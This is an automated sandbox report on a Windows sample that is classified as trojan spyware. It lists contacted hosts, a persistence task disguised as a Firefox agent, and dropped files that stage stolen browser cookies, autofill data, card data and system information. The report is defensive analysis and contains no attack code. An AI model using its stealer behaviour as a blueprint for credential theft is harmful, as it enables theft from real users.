172.67.216.236	swretjhwrtj.gq	United States	13335	CLOUDFLARENETUS	false
185.230.143.48	unknown	Russian Federation	59504	HostingvpsvilleruRU	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	470439
Start date:	24.08.2021
Start time:	08:44:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	69CDTt1pad.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@52/24@314/9
EGA Information:	Failed
HDC Information:	Successful, ratio: 77.2% (good quality ratio 57.8%) Quality average: 45.1% Quality standard deviation: 34.7%
HCA Information:	Successful, ratio: 90% Number of executed functions: 137 Number of non-executed functions: 103
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.210.154, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 104.26.13.31, 172.67.75.172, 104.26.12.31, 20.82.209.183, 202.137.234.30 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, api.ip.sb.cdn.cloudflare.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, mx.rediffmail.rediff.akadns.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:45:43	API Interceptor	12x Sleep call for process: svchost.exe modified
08:46:32	Task Scheduler	Run new task: Firefox Default Browser Agent 79BAC1F956FDB8E1 path: C:\Users\user\AppData\Roaming\tvvihsf
08:47:01	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
08:47:16	API Interceptor	1x Sleep call for process: explorer.exe modified
08:47:20	API Interceptor	63x Sleep call for process: C481.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5981930978381301
Encrypted:	false
SSDEEP:	6:0FtRMk1GaD0JOCEfMuaaD0JOCEfMKQmD+JutAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0PRTGaD0JcaaD0JwQQ+wtAg/0bjSQJ
MD5:	37A1B5661C1C7DBBE034592471004587
SHA1:	64AD66CFD3411344355BE5E8D998D2DE132AE941
SHA-256:	DE98855A1AA68B001AA0417E122A94A03B2527CA161D0AB54E77555C11562D3D
SHA-512:	6BA5E33C6D78E49063C744ED6FFB2DB030AB94C78CEC104ADBE0853A2BB4B67985CF6C2AD65F31F89BF4D5C54A2975986842E91FEFCE2492010A65F14B9F72B5
Malicious:	false
Reputation:	unknown
Preview:	......:{..(.....+-...yS.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................+-...yS...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa6ab32e3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09682199568485154
Encrypted:	false
SSDEEP:	6:SW4zwl/+E6bjN6RIE11Y8TRXUbn6bLt8K4W4zwl/+E6bjN6RIE11Y8TRXUbn6bLp:Q0+HwO4blUO58Ku0+HwO4blUO58K
MD5:	F457F3078B47A9827339E1A5330914D9
SHA1:	54428B2A3CAE54DCF89873307783A37F3F7277CF
SHA-256:	4475FF64D4BCC12EC86B57A09D13398EAB36A6CDB9BA6D57B73806974A75D7A3
SHA-512:	88232755B8FC0B28B6DA268CCF2C97818EAA678AC7C6A8E8126179F29982A7516701429F0DC934EA1A719C726A04C66DBF6AEAB46051CF7F80EAC626BF32B1DD
Malicious:	false
Reputation:	unknown
Preview:	..2.... ................e.f.3...w........................&..........w..+-...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................+-...y.................@.'H+-...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.1115988791644607
Encrypted:	false
SSDEEP:	3:7/9EvOIqkqQhl/bJdAtimnqPbLtAll:7AOIqkqKt4jn6bLtA
MD5:	DDF7482040C6F8BC65A4F4FB2267F41A
SHA1:	1686C13A0FD0496424DC10E19B55F09A4B362F05
SHA-256:	04EA680F56364F882F234DDB488A4B49FBA9FCE83CAA88EC1E9A2597D5D9514E
SHA-512:	37026CF270BCC2D93A1111ECA0AFB32FE56752A41E809665A18111F976C312D6B56BD0311BE8411DC324E2FDAAB4D24A25A510288DC589F16699745577594C6D
Malicious:	false
Reputation:	unknown
Preview:	f.Q......................................3...w..+-...y.......w...............w.......w....:O.....w..................@.'H+-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978A.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55682
Entropy (8bit):	3.0485675505020016
Encrypted:	false
SSDEEP:	1536:qQHq04ODqPPYC1pbMoTOa0MMinbPE2v7ZByMcZfbD60:qQHq04ODqPPYC1pbMoTOa0MjnbPE2v7O
MD5:	3A659C1C40ADCBBAFFC7653A5FC3FAD9
SHA1:	931176C1F9F2889031CE75409A75FA9E7EBD4F1D
SHA-256:	D9E80EBD7F77BA4902AFFC0AF7DF1BE6A7C3B7E251EF6D72A54589103A85D707
SHA-512:	93CFB08E315EF8DF4EB5F62DB36CC48D8A83C0CEE33239787E9411D0B6C26D484BAFBE576F651CBAF998E0C954A634934CEBA4613FBA8BA19CC544FFA91313F0
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA14F.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696624289858104
Encrypted:	false
SSDEEP:	96:9GiZYWwNJAevYuY5WTiHQYEZjct/iHQZUBwsj0Qa7jqAfR8IP93:9jZDspDHjZa7jqAfR7P93
MD5:	AB19306834B5C4FEA40519CF7B83EAF5
SHA1:	47F18046D730CA3D2425716517414CD5A6A54150
SHA-256:	AB1559FE14C7CE7A4C00852AF7F92206F8E671E40C66FCBFAD1C2C6613953942
SHA-512:	31BBD59A74B0B97C11A0CD276712AD2B1BA42E5FAE4996A16B6A21DFF9717341FD8A7D13E226EA47792DD9A4A4786E9819327B390037303A52A65FABCFD937ED
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE02E.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	56498
Entropy (8bit):	3.046397709679201
Encrypted:	false
SSDEEP:	1536:i2zHcZYgieDSeNIYC1JW4MM7kbPwfvctTvcc2zbGDIj:i2zHcZYgieDSeNIYC1JW4MqkbPwfvctS
MD5:	A9D1859CBDE553371022651623FA78A0
SHA1:	50B5101B30AE83E9229982C9643DFB08074F0F44
SHA-256:	AF93F5785C1824255AA7ABA8FC4B1996F7B87AA205FE832E5A7A2E329052049A
SHA-512:	EB4FD4FC232A5CA44B603760AA4DB309C3594200E9953DEFCD9A0056B997D9C9E39BCA3FF411E37B9FF2EE216FF6394D4FCDF7D02D3825E35C41CA512AF21503
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE89B.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6968954674963475
Encrypted:	false
SSDEEP:	96:9GiZYWTbn2Mh64YbOYPW36Ic5Hk/YEZCyt6iZQqfVwzxcna22yPyfgrIfPy3:9jZDTZUOR6IcLFxGa22yPyfgkfa3
MD5:	E5B966AF9B0E9A60532C3AFFC6DDBA2A
SHA1:	2D6E2AA347EE3DE1AECDF3128F10F6AF417A910C
SHA-256:	7F587D54125164772E7CA063411F0D4DCA5FD0C5223D3A611DD22C06450E593F
SHA-512:	859C388A5B3C7257C6196F787503C0377631158A5EDD84C165EE0751ACCAC75E43869B1CB2EBA6DAD44C9730F2607EE2D2DE0B6F7493D61094284615931284D8
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDDC.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	17318
Entropy (8bit):	3.127003139617129
Encrypted:	false
SSDEEP:	384:hQ++SaDDJHwzLkV8+GE0wwKcgDmswDtdCpCLLjfvH+R1h9tXQc:diHWQV3GEJRmDkCLex
MD5:	03564B44328872E6A77B0FFE59716F2E
SHA1:	D905F17BCFE41DBE54F7886CE61479BF841C4964
SHA-256:	6653FF741E4217B259904D4B1F5093421FFB70CC103188FC3966AB25CD0947ED
SHA-512:	5E3163278C848FC9433A9898C2508BBEBBA81A7374CAC5D842F355EF833407C5732DF954FCD02932751F9D3463DCF284295877CC1B46426E3A2779476F0595CE
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\d06ed635-68f6-4e9a-955c-4899f5f57b9a7687967218.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	96:MXQErWgedGx0TjLnmO96m7VwJ/UZD5Hs6DA:TYudrjzGE5dA
MD5:	28E61D3FABB039CF31426E2C07291298
SHA1:	28342265D78E61939692503B49B045DC6E535A4B
SHA-256:	6441623204D525056160B6548AE75B99E9B9DA60324370EB138D12A90C41B07C
SHA-512:	0AF62DB16D70A1511D232B4B5237DBA02299AC09366C61E074BA8733324DBD8890645E60410BAF3AE7BC6490BE5C00BCC7C6BB191FED9AFB7D8E1692088C4690
Malicious:	false
Reputation:	unknown
Preview:	PK.........}.S............#.../Autofill/Google Chrome_Default.txtUT...}.%a}.%a}.%a..PK.........}.S............#.../Autofill/Google Chrome_Default.txtUT...}.%a}.%a}.%aPK.........}.S................/CC/Google Chrome_Default.txtUT...}.%a}.%a}.%a..PK.........}.S................/CC/Google Chrome_Default.txtUT...}.%a}.%a}.%aPK.........}.S................/Cookies/Edge_Cookies.txtUT...v.%av.%av.%a..PK.........}.S................/Cookies/Edge_Cookies.txtUT...v.%av.%av.%aPK.........}.S............".../Cookies/Google Chrome_Default.txtUT...x.%ax.%ax.%a-..n. ...K.)t....%H...".ysV.W..5D....]..j.u.w..=z.e.=.!.P......x..>.E.V1.:=.E>R.QSD.U..k.....N..:;]~j.......l,.A..!S_.L.A..pS..'.\|.wjOi..a...6g..<...mw....I4.X..F4o'.....s.Kz..^o..[q..-...PK.........}.ST.2.........".../Cookies/Google Chrome_Default.txtUT...x.%ax.%ax.%aPK.........}.S................/Cookies/IE_Cookies.txtUT...v.%av.%av.%a..PK.........}.S................/Cookies/IE_Cookies.txtUT...v.%av.%av.%aPK.........}.S............$.../Dow

C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6:PkopYjdhX0/tbD2Pdp9TaMbl/XyXqkxcP/Zy:copYxhHveaPx4cP/o
MD5:	01E689A15E7D09E945EE1A10E65740D9
SHA1:	75DAB7380AD6D001CD397F8C3D19CDE76AF4FF62
SHA-256:	8A7A8D8659BF0FE6BAF6DE8CCA6C8A8D0CCA6E7511DD9321660945A53C21C16D
SHA-512:	ADB9D0923A2EDB40105B0777880575BF5933462805E02C32BE9593DF086FF530C000392930F82D4C53B9112ED79BC351677028CBBAC84AFFA1CFD4EDED9EEE19
Malicious:	false
Reputation:	unknown
Preview:	.google.com.FALSE./.FALSE.1617282895.NID.204=lnU8rUIoxvWmSnStHN12ZO72aUiWVV1axeN4DtOTKTfvcrldjVWnMTIQIS8iJiRN9UHb6IUY-QDONDNofBZR-n0DF-PM3FrKHL6vfmJVykmJ7r1MH14-Wacprxo-dlNZMAV5ps4W2FLalvE0BMvycvUBSFkTfeWy7vzxBOBIFRE..

C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\Files\11111.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	unknown
Preview:	PK....................

C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\information.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	192:EOIOGwGQo9gZi+QVWEi7pgBdQXRsg8qbNqqN:txdNRZi+9Ei7pgUX2MboqN
MD5:	2A2DC34B24CB977DAF423240AF16686D
SHA1:	9D862EA0DE983C7665F1FB29E8AF6A891F5BDA89
SHA-256:	85ED80FBC43F23468818F9A15BFFA5EC3DE1B4DF863A5F9C287F8511908B151E
SHA-512:	320060EB285382DA1A654A36F27941428855AE2B0528C1F435844AA41FBD79107440BB004C9AB3F734C2CE0FDBA803343F149B9797458FF404D5D39D0D832A75
Malicious:	false
Reputation:	unknown
Preview:	Version: 40.1....Date: Tue Aug 24 08:47:10 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user~1\AppData\Local\Temp\CA2F.exe ..Work Dir: C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3 ....Windows: Windows 10 Pro [x64]..Computer Name: 226533..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 24/8/2021 8:47:10..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [300]..- csrss.exe [396]..- wininit.exe [468]..- csrss.exe [484]..- services.exe [560]..- winlogon.exe [568]..- lsass.exe [584]..- fontdrvhost.exe [684]..- fontdrvhost.exe [692]..- svchost.exe [716]..- svchost.exe [792]..- svc

C:\ProgramData\ZDTM9ZA58FK7BC9692W7CABF3\files\temp Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	768:loiWBBjDoiWBBjN20olG4oNQraFB/JraFB/Q:KiVindo6QLQG
MD5:	AC3471E38F6828C966C6C599B6698C65
SHA1:	4460265D7DA871DFDDDE91DCED8836B38F7129B0
SHA-256:	1ACE57E23CA15ECD456C40555A3EB91C40B8CC879B5E471E24F76D273B5978F8
SHA-512:	34ADEED1ED67BF83C100DC2B44076A901BD9D7D2CBB5FA56DF44305BEA84254B42DB84E49DD2C8270408F59C4B6333C64852B061FA0C4DF4B3FB463F92F6D433
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
